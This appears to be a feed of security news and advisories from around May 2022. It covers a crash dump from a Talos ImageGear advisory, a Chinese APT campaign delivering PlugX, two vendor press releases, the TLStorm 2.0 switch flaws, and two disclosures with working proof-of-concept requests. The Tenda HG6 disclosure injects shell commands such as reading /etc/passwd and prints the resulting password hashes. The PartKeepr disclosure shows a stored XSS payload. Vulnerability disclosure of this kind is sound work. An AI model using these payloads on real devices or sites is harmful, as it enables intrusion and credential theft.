    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    
    
    STACK_COMMAND:  ~0s ; .cxr ; kb
    
    SYMBOL_NAME:  verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+b8
    
    MODULE_NAME: verifier_71920000
    
    IMAGE_NAME:  verifier.dll
    
    FAILURE_BUCKET_ID:  INVALID_POINTER_READ_AVRF_c0000005_verifier.dll!AVrfpDphFindBusyMemoryNoCheck
    
    OS_VERSION:  10.0.19041.1
    
    BUILDLAB_STR:  vb_release
    
    OSPLATFORM_TYPE:  x64
    
    OSNAME:  Windows 10
    
    IMAGE_VERSION:  10.0.19041.1
    
    FAILURE_ID_HASH:  {bd57151c-e59f-3c94-75ca-6923d50e6d0d}
    
    Followup:     MachineOwner
    ---------
    

**Vendor Response**

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

Download Links Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-01-26 - Vendor disclosure  
2022-04-29 - Vendor Patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-22137: TALOS-2022-1449 || Cisco Talos Intelligence Group

Chinese state-sponsored actors have been caught red-handed trying to extract intelligence from Russians via a guard camp close to their border.
The post State-backed hacking group from China is targeting the Russian military appeared first on Malwarebytes Labs.

In an unexpected turn of events, research has surfaced about a Chinese APT (advanced persistent threat) group targeting the Russian military in recent cyberattacks.

Tracked as Bronze President, Mustang Panda, RedDelta, and TA416, the group has focused mainly on Southeast Asian targets—and more recently, European diplomats—and turned their attention towards Russia and started targeting the country’s military situated close to the Chinese border.

Dell SecureWorks retrieved a file named _Blagoveshchensk – Blagoveshchensk Border Detachment_, which bears the icon of a PDF file but is actually an executable file.

From the report:

> “Blagoveshchensk is a Russian city close to the China border and is home to the 56th Blagoveshchenskiy Red Banner Border Guard Detachment. This connection suggests that the filename was chosen to target officials or military personnel familiar with the region.”

Once the supposed document is “opened,” the executable downloads four files, including a clean document file used as a decoy (screenshot below), from a server Mustang Panda is known to use.

_Although the file name is aimed at Russian recipients, it throws one off when they see the decoy document written in English. (Source: Dell SecureWorks)_

The document appears like a formal report from the European Commission, and it details the refugee and migrant status pressuring countries bordering Belarus.

The three additional files are required for Mustang Panda to use DLL search order hijacking to install a variant of PlugX, an old remote access tool (RAT), onto target systems. This allows threat actors to secretly load a malicious DLL, thus avoiding detection from security solutions software.

PlugX is capable of stealing sensitive information from target machines. Although this, as a whole, is a benign attack that involves intelligence gathering, it is interesting to note the shifting targets, presumably based on the political situation in Europe and what’s happening in Ukraine. Suffice to say, China continues to look out for itself and its interests, even if it involves countries it considers “strategic partners of coordination”.

State-backed hacking group from China is targeting the Russian military

Tenda HG6 version 3.3.0 suffers from a remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands through the pingAddr and traceAddr HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

  
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Vendor: Tenda Technology Co.,Ltd.  
Product web page: https://www.tendacn.com  
                  https://www.tendacn.com/product/HG6.html  
Affected version: Firmware version: 3.3.0-210926  
                  Software version: v1.1.0  
                  Hardware Version: v1.0  
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network  
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),  
a voice port to meet users' requirements for enjoying the Internet,  
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters  
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5706  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php

22.04.2022

--

ping.asp:  
---------

POST /boaform/formPing HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---  
TZ  
app.gwdt  
bftpd.conf  
buildtime  
check_version.txt  
config  
config.csv  
config_default.xml  
config_default_hs.xml  
dhclient-script  
dnsmasq.conf  
ethertypes  
factory_default.xml  
ftpdpassword  
group  
hardversion  
inetd.conf  
init.d  
inittab  
innversion  
insdrv.sh  
irf  
mdev.conf  
omci_custom_opt.conf  
omci_ignore_mib_tbl.conf  
omci_ignore_mib_tbl_10g.conf  
omci_mib.cfg  
orf  
passwd  
ppp  
profile  
protocols  
radvd.conf  
ramfs.img  
rc_boot_dsp  
rc_voip  
release_date  
resolv.conf  
rtk_tr142.sh  
run_customized_sdk.sh  
runoam.sh  
runomci.sh  
runsdk.sh  
samba  
scripts  
services  
setprmt_reject  
shells  
simplecfgservice.xml  
smb.conf  
softversion  
solar.conf  
solar.conf.in  
ssl_cert.pem  
ssl_key.pem  
version  
wscd.conf

ping6.asp:  
----------

POST /boaform/formPing6 HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---  
boa.conf  
web

tracert.asp:  
------------

POST /boaform/formTracert HTTP/1.1  
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---  
/home/httpd

tracert6.asp:  
-------------

POST /boaform/formTracert6 HTTP/1.1  
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh  
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh  
nobody:x:0:0::/tmp:/dev/null  
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Tenda HG6 3.3.0 Remote Command Injection

Tiger Global Management invests $35 million in SkyHawk Security to accelerate growth.

**TEL AVIV, Israel, May 3, 2022—** Radware® (NASDAQ: RDWR), a leading provider of cyber security and application delivery solutions, today announced the spinoff of its Cloud Native Protector (CNP) business to form a new company called SkyHawk Security. To accelerate

SkyHawk Security’s development and growth opportunities, an affiliate of Tiger Global

Management will make a $35 million strategic external investment, resulting in a valuation of $180 million. Tiger Global Management is a leading global technology investment firm focused on private and public companies in the internet, software, and financial technology sectors.

Skyhawk Security is a leader in cloud threat detection and protects dozens of the world’s leading organizations using its artificial intelligence and machine learning technologies. Its Cloud Native Protector provides comprehensive protection for workloads and applications hosted in public cloud environments. It uses a multi-layered approach that covers the overall security posture of the cloud and threats to individual workloads. Easy-to-deploy, the agentless solution identifies and prevents compliance violations, cloud security misconfigurations, excessive permissions, and malicious activity in the cloud.

“We recognize the growing opportunities in the public cloud security market and are planning to capitalize on them,” said Roy Zisapel, Radware’s president and CEO. “We look forward to partnering with Tiger Global Management to scale the business, unlock even more security value for customers, and position SkyHawk Security for long-term success.”

The spinoff, which adds to Radware’s recently announced strategic cloud services initiative, further demonstrates the company’s ongoing commitment to innovation. SkyHawk Security will have the ability to operate with even greater sales, marketing, and product focus as well as speed and flexibility. Current and new CNP customers will benefit from future product development efforts, while CNP services for existing customers will continue without interruption.

Radware does not expect the deal to materially affect operating results for the second quarter or full year of 2022.

**About Tiger Global Management**

Tiger Global Management is a leading global technology investment firm that focuses on private and public companies in the software, internet, and financial technology sectors. Since 2001, Tiger Global has invested in hundreds of companies across more than 30 countries, including investments ranging from Series A to pre-IPO. The firm aims to partner with dynamic entrepreneurs operating market-leading companies in its core focus areas.

**About Radware**

Radware® (NASDAQ: RDWR) is a global leader of cyber security and application delivery solutions for physical, cloud, and software defined data centers. Its award-winning solutions portfolio secures the digital experience by providing infrastructure, application, and corporate IT protection, and availability services to enterprises globally. Radware’s solutions empower enterprise and carrier customers worldwide to adapt to market challenges quickly, maintain business continuity, and achieve maximum productivity while keeping costs down. For more information, please visit the Radware website.

Radware encourages you to join our community and follow us on: Facebook, LinkedIn, Radware Blog, Twitter, YouTube, and Radware Mobile for iOS and Android.

©2022 Radware Ltd. All rights reserved. Any Radware products and solutions mentioned in this press release are protected by trademarks, patents, and pending patent applications of Radware in the U.S. and other countries. For more details, please

see: https://www.radware.com/LegalNotice/. All other trademarks and names are property of their respective owners.

Radware believes the information in this document is accurate in all material respects as of its publication date. However, the information is provided without any express, statutory, or implied warranties and is subject to change without notice.

The contents of any website or hyperlinks mentioned in this press release are for informational purposes and the contents thereof are not part of this press release.

Radware Launches SkyHawk Security, a Spinoff of Its  Cloud Native Protector Business

Providing continuous penetration testing with context, and a host of other features, the Incenter platform is built to give organizations what they need to effectively secure their environment.

**NEW YORK, NY, May 3, 2022 -** OccamSec, a leading cybersecurity provider, announced today the launch of their Incenter platform. Incenter identifies the security weaknesses an organization has in real-time, and helps teams develop insights and communicate business context from a security perspective.

For today’s organizations, the threat landscape is constantly evolving. Penetration testing and vulnerability scanning can help, but with new vulnerabilities and exploits found all the time, infrequent testing means risk data may be outdated. At the same time the industry is trending towards slicing the solution ever thinner, which means costs keep increasing.

Incenter combines the functionality of a range of security services in one single solution. The platform provides, in real time, where an organization is vulnerable, and just as critically, what the impact will be if an attack occurs.

Incenter utilizes a dual approach. It combines the best in technology with advanced automated testing, and the best in people with OccamSec’s security team. Supported by vulnerability research and a threat intelligence team, the burden on clients having to buy multiple services is eliminated.

Users have the ability to generate reports that compile real-time information with the touch of a button, rather than waiting for a timed report to be generated. Incenter also provides step-by-step guidance on how to mitigate any risks that are identified, with the tools an organization already has which means no hidden costs.

Incenter combines the functionality of a range of security services in one single solution:

*   Manual Penetration Testing
*   Penetration Testing as a Service (PTaaS)
*   Automated Security Validation (ASV)
*   Vulnerability Scanning
*   External Attack Surface Management (EASM)
*   Crowd Source Penetration Testing
*   Threat Intelligence

This provides a single source of truth on the exposures an organization faces. Improving the effectiveness of any security team, regardless of size, and at the same time breaking organizations out of ever increasing cyber security expenditure.

The platform's focus on the unique business context of each organization means that security teams no longer have to trudge through 1000’s of scan findings or determine how relevant a penetration test finding is and how to fix it. At the same time from the dashboard, management can see a high level summary of their organization's exposure, the likelihood of a breach, and how much it’s going to cost them.

“Over the years we have seen what works, what doesn’t and where the gaps are,” says OccamSec founder Mark Stamford. “The biggest gap is organizations needing more and more tools and services to effectively secure themselves. The key to effective security is joining the dots, not having ever more dots scattered in ever more places. With Incenter we have combined the talents of our security team and their expert knowledge, with a technical solution that is unrivaled. The result is a win for our clients, regardless of size.”

Incenter is now available. For more information, visit: www.occamsec.com/incenter

**About OccamSec**

OccamSec is a leading provider in the world of cybersecurity. Its clients rely on them to provide information security services that exceed current industry standards. OccamSec provides accurate, actionable information to reduce risk and enable better informed decisions. Its unique end-to-end solutions detect, identify, respond, and protect in order to maximize the effectiveness of security programs.

OccamSec’s methodology is the result of years of experience in the field, providing real business outcomes. Its team has performed security assessments at some of the world’s largest companies, including financial services and technology. They bring this experience to each and every project, ensuring that their clients get the best service in the industry.

OccamSec Unveils New Cybersecurity Platform

The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

Title: Tenda HG6 v3.3.0 Remote Command Injection Vulnerability  
Advisory ID: ZSL-2022-5706  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 03.05.2022

**Summary**

HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1\*GE,3\*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications.

**Description**

The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

**Vendor**

Tenda Technology Co.,Ltd. - https://www.tendacn.com

**Affected Version**

Firmware version: 3.3.0-210926  
Software version: v1.1.0  
Hardware Version: v1.0  
Check Version: TD\_HG6\_XPON\_TDE\_ISP

**Tested On**

Boa/0.93.15

**Vendor Status**

\[22.04.2022\] Vulnerability discovered.  
\[26.04.2022\] Vendor contacted.  
\[01.05.2022\] No response from the vendor.  
\[03.05.2022\] Public security advisory released.

**PoC**

tenda\_hg6\_cmdinj.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[03.05.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.

**Description**

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

**Reproduction Steps**

Browsing to Edit tab, select project and add new project.  
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

    POST /api/projects HTTP/1.1
    Host: partkeepr.vuln
    Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 303
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    {"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}
    

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from **projects** , the following tabs are also vulnerable : **footprints**,**manufacturers**,**storage locations**, **distributors**, **part measurement units** , **units** and **batch jobs**

**System Information**

*   PartKeepr Version: 1.4.0
*   Operating System: LInux
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql
*   Reproducible on the demo system: Yes

CVE-2021-39390: Stored XSS in PartKeepr · Issue #1237 · partkeepr/PartKeepr

In the latest incarnation of the TLStorm vulnerability, switches from Avaya and Aruba — and perhaps others — are susceptible to compromise from an internal attacker.

Network switches from Aruba and Avaya are vulnerable to multiple flaws that could allow attackers to remotely execute code and completely take over the devices.

Researchers from device-intelligence firm Armis found five vulnerabilities — two flaws in Aruba switches and three flaws in Avaya switches — that could be used to compromise networks that allow some outsider access, even with limited rights. The flaws can be exploited by a user of a captive portal or authentication server, researchers explained.

Worryingly, in looking at the details of the bugs, the three Avaya bugs are zero-click, requiring no authentication or user interaction to exploit. One of them affects an end-of-life device and won't be receiving a patch.

Three of the vulnerabilities originate with improper handling of errors produced by a third-party library for implementing TLS produced by Internet of Things (IoT) cybersecurity firm Mocana.

Because switches are typically not Internet-facing, the vulnerabilities face less danger from external hackers, but the risk is still significant, says Barak Hadad, head of research for Armis.

"These are major issues, because switches act as the gatekeepers when we talk about segmentation," he says. "When you gain control over switches, any segmentation of the network becomes invalid."

The vulnerability details are as follows:

Aruba:

*   CVE-2022-23677 (9.0 CVSS score) — NanoSSL misuse on multiple interfaces (RCE)\*
*   CVE-2022-23676 (9.1 CVSS score) — RADIUS client memory corruption vulnerabilities

Avaya:

*   CVE-2022-29860 (CVSS 9.8) — TLS reassembly heap overflow\*
*   CVE-2022-29861 (CVSS 9.8) — HTTP header parsing stack overflow
*   HTTP POST request handling heap overflow (no CVE because it is in an older version)\*

\* These are caused by the interaction between Mocana NanoSSL and the products.

**Software Supply-Chain Woes Persist**  
The vulnerabilities underscore the risks of the software supply chain and the potential dangers that come with using third-party components. Security flaws in the libraries on which software depends — or in this case, in the way that the software and library interact — can create or propagate vulnerabilities. On average, 78% of software codebases consist of open source components and libraries.

In March, researchers discovered a similar set of flaws that caused security vulnerabilities in more than 150 IoT products, also caused by another third-party component.

"While the use of external libraries has many advantages, it also brings inherent uncertainty," Armis stated in its security advisory published on May 3. "Implanting a 'foreign' code means the vendor is trusting it to be implemented safely, since any security issues originating in the external library are embedded within it, and automatically become security issues which the vendor has less control over."

**TLStorm, Part 2**  
At the heart of the Mocana-related vulnerabilities are unstable error states in the Mocana NanoSSL library that handles transport layer security (TLS) for the products' management interface.

The issues occur because the attacker can craft network packets that cause errors in the Mocana NanoSSL library, and developers producing software for vendors do not handle the errors properly.

The result are two classes of vulnerabilities: memory corruption and state confusion.

"If you start a TLS handshake and the other side sends an improper message, if you don't check the error code correctly, that scenario can be leveraged to gain remote code execution in some cases," Armis' Hadad says. "The manual clearly says that the developer should check the error, but as we know, it's not common for developers to read through the entire manual."

Armis has worked with Mocana, Aruba, and Avaya to remediate the issues where appropriate. The companies' customers have been notified, and each company has released updated software. In Mocana's case, even though the vulnerabilities are not technically caused by the software, the company has created an update anyway to avoid future flawed implementations.

"It is not a Mocana vulnerability, but nonetheless, they have published new software that makes it so you are not in a vulnerable situation just because you did not check the error code," Hadad says.

The vulnerabilities, dubbed TLStorm 2.0 by Armis, are similar to ones announced in March that affect smart-connected uninterruptible power supplies (UPS).

**Not the First Flawed implementation**  
Previously, Armis researchers showed the same vulnerabilities used against several models of UPS from APC, now owned by Schneider Electric. The attacks, which targeted UPS that connected to the Schneider Electric Cloud to enable management, could allow attackers to remotely compromise devices without any user interaction or leaving any trace of the attack.

Because new firmware could be loaded into the devices remotely, attackers could change the waveform and voltage of the AC power provided to connected devices and even cause the UPS to overheat.

"The fact that UPS devices regulate high voltage power, combined with their Internet connectivity — makes them a high-value cyber-physical target," Armis stated in its March advisory regarding the vulnerabilities, which it called TLStorm. "Since the TLS attack vector can originate from the Internet, these vulnerabilities can act as a gateway to the internal corporate network. Bad actors can use the TLS state confusion to identify themselves as the Schneider Electric cloud and collect information about the UPS behind the corporate firewall."

Tag

#intel